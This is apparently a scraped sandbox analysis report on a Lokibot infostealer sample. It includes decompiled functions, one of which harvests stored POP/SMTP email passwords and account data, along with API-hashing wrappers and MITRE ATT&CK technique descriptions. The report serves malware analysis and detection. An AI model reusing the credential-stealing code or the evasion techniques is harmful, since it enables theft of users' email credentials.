Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}

0x004058f8
0x00405903
0x00405906

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}

0x00405932
0x0040593d
0x00405940

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
SmtpPassword, xrefs: 0040D117
PopAccount, xrefs: 0040D0B6
EmailAddress, xrefs: 0040D074
SmtpPort, xrefs: 0040D0EB
PopPort, xrefs: 0040D0A7
SmtpAccount, xrefs: 0040D0FA

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}

0x0040317f
0x00403180
0x00403180
0x00403180
0x0040318d
0x00403196
0x00403199
0x0040319b
0x004031a1
0x004031a9
0x004031ab
0x004031ac
0x004031ae
0x00000000
0x004031b0
0x004031b3
0x004031c2
0x004031c7
0x004031cd
0x004031e0
0x00000000
0x00000000
0x00000000
0x004031cd
0x004031d7
0x004031dd
0x004031cf
0x004031cf
0x004031d1
0x004031d5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_ZciowjM9hN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZciowjM9hN

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZciowjM9hN.exe.log

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
ZciowjM9hN

Function 010E9530 Relevance: 1.7, APIs: 1, Instructions: 191
COMMON

Function 051C0040 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 010E5364 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 010E3E08 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 051C2600 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 010EBB11 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Function 010EAC5C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 010EBA49 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Function 010E8A90 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 010E9990 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Function 010E9710 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 051C0288 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre